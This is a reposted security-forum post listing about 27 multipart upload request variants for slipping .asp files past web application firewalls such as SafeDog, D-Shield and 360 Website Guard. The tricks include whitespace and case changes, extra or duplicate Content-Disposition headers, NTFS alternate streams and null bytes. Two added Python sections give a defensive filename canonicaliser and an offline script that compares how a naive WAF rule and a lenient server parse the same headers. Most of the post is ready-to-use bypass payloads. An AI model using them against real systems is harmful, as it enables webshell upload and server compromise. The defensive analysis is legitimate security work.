Bypassing a WAF on file upload

Baseline request

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass 0: tab before the filename ([0x09] denotes a literal tab byte)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="[0x09]a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass 1: drop the double quotes

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename=a.asp
Content-Type: text/html[/mw_shl_code]


Bypass 2: add an extra filename1 parameter

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp";filename1="test.jpg"
Content-Type: text/html[/mw_shl_code]


Bypass 3: a + inside form-data

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name="filepath";filename="test.asp"
Content-Type: text/html[/mw_shl_code]


Bypass 4: mixed case in the header name

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass 5: drop form-data

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass 6: several spaces after Content-Disposition: (or after form-data;)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition:     form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass 7: a.asp . (space + dot after the extension)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="a.asp ."
Content-Type: text/html[/mw_shl_code]


Bypass 8: line break inside the quotes

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="a.asp
"
Content-Type: text/html[/mw_shl_code]


Bypass 9: NTFS alternate data stream (0x00 denotes a literal null byte)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="test.asp::$DATA"
Content-Type: text/html

------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="test.asp::$DATA\0x00\fuck.asp0x00.jpg"
Content-Type: text/html[/mw_shl_code]


Bypass 10: duplicate Content-Disposition headers. Testing against IIS 6.0 showed that it always takes the value from the first Content-Disposition as the received parameter, while SafeDog (安全狗) always takes the value from the last Content-Disposition. So we tried a request built like the following (test.asp was uploaded successfully):

[mw_shl_code=bash,true]Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"

--------------------------------15377259221471
Content-Disposition: form-data; name="FileUploadName"; filename="test.txt"
Content-Type: application/octet-stream
Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"
Content-Disposition: form-data;
name="FileUploadName"; filename="test.asp"[/mw_shl_code]


Bypass 11: swap the header order

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name="filepath"; filename="a.asp"[/mw_shl_code]


Some of the methods above get past not only SafeDog (安全狗) but also D盾 (D-Shield), 360网站卫士 (360 Website Guard) and others. How would you classify them? I lump them into two classes: platform characteristics and faulty parsing by the WAF (I'm not an academic, so this is casual wording). Characteristics include operating-system characteristics, protocol characteristics and so on. Most of the methods above are protocol characteristics, because the form-data format is extremely loose; some are OS characteristics, such as the trailing space, the trailing dot and the NTFS stream. Faulty parsing covers cases like bypass 2, the extra filename1 parameter, which would never be usable under normal conditions; and bypass 0, where the WAF cannot parse a special character, comes down in the end to the WAF mishandling the content it parses.
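The OS-characteristic tricks above (trailing space and dot, the NTFS stream, the null byte, a tab or line break inside the quotes) all rely on the server applying its extension policy to a name that differs from the one the file system finally creates. As an added example, not part of the original post and not the code of any product mentioned in it, here is the server-side check a defender would want: it reduces the client-supplied name to the on-disk name first, then applies an extension allowlist, and stores the file under a random name. The allowlist set is an assumption of the example.

```python
import secrets

# Extension allowlist for the upload endpoint: an assumption of this example,
# adjust to what the application really needs to accept.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def canonical_filename(raw: str) -> str:
    """Reduce a client-supplied filename to the name the file system would
    actually create, so policy is applied to that name rather than to the raw
    string the WAF or the web framework saw."""
    # A null byte terminates the string for C-style file APIs:
    # "x.asp\0.jpg" is created as "x.asp".
    name = raw.split("\x00", 1)[0]
    # Drop any directory component, with either separator.
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    # "test.asp::$DATA" writes the default stream of test.asp and "a.asp:x"
    # writes a named stream of a.asp; the on-disk name is what precedes the colon.
    name = name.split(":", 1)[0]
    # Windows silently strips trailing spaces and dots ("a.asp ." -> "a.asp");
    # the leading tab and trailing newline come from the quoting tricks above.
    name = name.strip().rstrip(" .").strip()
    return name


def is_allowed_upload(raw: str) -> bool:
    """Allowlist check on the last extension of the canonical name."""
    name = canonical_filename(raw)
    if not name or "." not in name:
        return False
    return name.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def storage_name(raw: str) -> str:
    """Name to store under: random, keeping only the validated extension, so
    nothing the client controls reaches the file system."""
    if not is_allowed_upload(raw):
        raise ValueError(f"rejected upload filename: {raw!r}")
    ext = canonical_filename(raw).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs, taken from the filename tricks in this post.
    for sample in ["a.asp", "a.asp .", "test.asp::$DATA", "\ta.asp", "a.asp\n",
                   "test.asp::$DATA\x00\\fuck.asp\x00.jpg", "..\\..\\photo.jpg"]:
        print(f"{sample!r:45} -> {canonical_filename(sample)!r:12} "
              f"allowed={is_allowed_upload(sample)}")
```

Canonicalising before the check is what closes the OS-characteristic class; it does nothing for the protocol class, where the discrepancy is in header parsing rather than in the filename, and it does not replace storing uploads outside the web root with a server-chosen name.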

As for characteristics, the only ones that seem usable for upload are OS characteristics and protocol characteristics. OS characteristics have yielded only a handful of tricks in all the years these systems have existed, and for rookies like us they are even harder to dig up. So we turn our attention to the protocol.


Baseline request

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


We have already tested the methods above. Now think: if you came up with using a Windows characteristic to add a space, why not use the protocol itself to add or remove spaces?


Bypass method 001 (no space after Content-Disposition:)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 002 (two spaces after Content-Disposition:)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:  form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 003 (no space after Content-Type:)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type:text/html[/mw_shl_code]


Bypass method 004 (space between filename= and the quoted value)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename= "a.asp"
Content-Type:text/html[/mw_shl_code]


Bypass method 005 (two spaces after form-data;)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data;  name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


That makes five methods. Now, if a space works, what else can stand in for a space? A tab? Let's try.

Bypass method 006 (tab or a run of whitespace after Content-Disposition:)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:     form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 007 (run of whitespace after form-data;)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data;      name="uploaded"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 008 (run of whitespace after filename=)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename=    "a.asp"
Content-Type: text/html[/mw_shl_code]


The methods above can be extended in many more ways. Remember one thing: what can replace a space!


Next, building on the previously published methods: case variation.

Bypass method 009 (Content-disposition)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 010 (Form-data)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: Form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 011 (Name=)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; Name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 012 (Filename=)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; Filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 013 (Content-type)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-type: text/html[/mw_shl_code]


Now let's combine this with one of the earlier bugs. Remember the + inside form-data? Why not put it in front of or behind the word instead?


Bypass method 014 (+ before form-data)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


Bypass method 015 (+ after form-data)

[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]


That is 15 methods listed, but really only 3 tricks. We only demonstrated against SafeDog (安全狗), yet these methods get past most of today's WAFs, and even where one is blocked, combining them sometimes produces results beyond what you would expect. There are at least another 20 methods besides. I remember a girl once telling me that hacking is about the mind: stay unconstrained and you will find more fun things.

As for the parsing side, that is left for everyone to fuzz on their own; anything published just gets killed off right away!
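Every one of the 15 methods, the "what can replace a space" question and the duplicate-header trick of bypass 10 come down to the same thing: the WAF and the web server extract a different filename from the same part. As an added example, not part of the original post and not the code of SafeDog, IIS or any other product, the script below makes that discrepancy visible offline. The "naive check" is a hypothetical fail-open signature: one exact regex for the textbook header shape, and, following the post's observation about SafeDog, the last matching header wins. The "server" is a hypothetical permissive parser in which the first header wins, as the post reports for IIS 6.0. The variant strings are constructed from the requests in this post; the function and variant names are this example's own.

```python
import re

# Model A: a naive signature check, written the way a fail-open WAF rule might be.
# One exact, case-sensitive regex for the textbook header; a part whose header
# does not match simply has "no filename" to inspect.  LAST match wins.
# Hypothetical model, not the code of any product.
NAIVE_RE = re.compile(r'^Content-Disposition: form-data; name="[^"]*"; filename="([^"]*)"$')


def naive_waf_filename(header_block: str):
    found = []
    for line in header_block.split("\r\n"):
        m = NAIVE_RE.match(line)
        if m:
            found.append(m.group(1))
    return found[-1] if found else None


# Model B: a permissive server-side parser: case-insensitive header and parameter
# names, optional whitespace around ':' and '=', quoted or bare values, unknown
# disposition types and extra parameters ignored, FIRST header wins.
# Also hypothetical; a ';' inside quotes is not handled.
def lenient_server_filename(header_block: str):
    for line in header_block.split("\r\n"):
        if ":" not in line:
            continue
        hname, hvalue = line.split(":", 1)
        if hname.strip().lower() != "content-disposition":
            continue
        for token in hvalue.split(";"):
            if "=" not in token:
                continue  # 'form-data', '+form-data', 'f+orm-data' ... all ignored
            key, val = token.split("=", 1)
            if key.strip().lower() != "filename":
                continue
            val = val.strip()
            if len(val) >= 2 and val[0] == val[-1] == '"':
                val = val[1:-1]
            return val
    return None


def part(*header_lines: str) -> str:
    """Header block of one multipart part, CRLF-joined as it appears on the wire."""
    return "\r\n".join(header_lines)


CT = "Content-Type: text/html"

# Constructed from the requests in this post; keys follow the post's numbering.
VARIANTS = {
    "baseline":                  part('Content-Disposition: form-data; name="filepath"; filename="a.asp"', CT),
    "bypass 1 bare value":       part('Content-Disposition: form-data; name="filepath"; filename=a.asp', CT),
    "bypass 2 extra filename1":  part('Content-Disposition: form-data; name="filepath"; filename="a.asp";filename1="test.jpg"', CT),
    "bypass 4 header-name case": part('ConTent-Disposition: form-data; name="filepath"; filename="a.asp"', CT),
    "bypass 10 duplicate headers": part(
        'Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"',
        'Content-Disposition: form-data; name="FileUploadName"; filename="test.txt"',
        "Content-Type: application/octet-stream"),
    "bypass 11 header order swapped": part(CT, 'Content-Disposition: form-data; name="filepath"; filename="a.asp"'),
    "001 no space after colon":  part('Content-Disposition:form-data; name="filepath"; filename="a.asp"', CT),
    "004 space before value":    part('Content-Disposition: form-data; name="filepath"; filename= "a.asp"', CT),
    "006 tab after colon":       part('Content-Disposition:\tform-data; name="filepath"; filename="a.asp"', CT),
    "012 parameter-name case":   part('Content-Disposition: form-data; name="filepath"; Filename="a.asp"', CT),
    "014 plus before form-data": part('Content-Disposition: +form-data; name="filepath"; filename="a.asp"', CT),
}


def differential(variants=VARIANTS):
    """variant name -> (filename the naive check sees, filename the server sees)."""
    return {k: (naive_waf_filename(v), lenient_server_filename(v)) for k, v in variants.items()}


def bypasses(variants=VARIANTS):
    """Variants where the server stores a name the naive check never inspected."""
    return sorted(k for k, (waf, srv) in differential(variants).items() if waf != srv)


if __name__ == "__main__":
    for name, (waf, srv) in differential().items():
        flag = "DIVERGE" if waf != srv else ""
        print(f"{name:32} naive={waf!r:12} server={srv!r:12} {flag}")
```

Running it prints one line per variant; everything except the baseline and the swapped header order diverges, which is the point of the post: the swap changes nothing for a per-line regex, while any whitespace, case or token change outside the exact shape leaves the naive check with nothing to inspect. To fuzz your own target, replace the two model functions with calls against the real WAF and the real upload handler and keep the `VARIANTS` table as the seed corpus.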


Reposted from Legend's BLog

